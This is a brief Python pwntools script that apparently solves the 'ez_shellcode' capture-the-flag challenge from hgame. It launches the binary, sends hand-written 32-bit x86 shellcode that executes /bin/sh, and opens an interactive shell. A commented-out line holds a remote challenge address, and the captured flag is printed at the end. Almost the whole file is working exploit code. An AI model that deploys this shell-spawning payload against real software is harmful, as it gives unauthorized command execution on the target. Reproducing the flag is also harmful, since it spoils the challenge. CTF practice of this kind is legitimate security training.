from pwn import *
# r = remote("111.230.149.72",10004)
p = process('./ez_shellcode')
print p.recv
# payload = "\x6a\x0b"+"\x58"+"\x99"+"\x52"+"\x68\x2f\x2f\x73\x68"+"\x68\x2f\x62\x69\x6e"+"\x89\xe3"+"\x52" +"\x53"+"\x89\xe1"+"\xcd\x80"
payload = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x00\x53\x89\xe1\xcd\x80"
p.send(payload)
p.interactive()

#hgame{sh311c0d3_is_s0000000_p0w3rfu1}

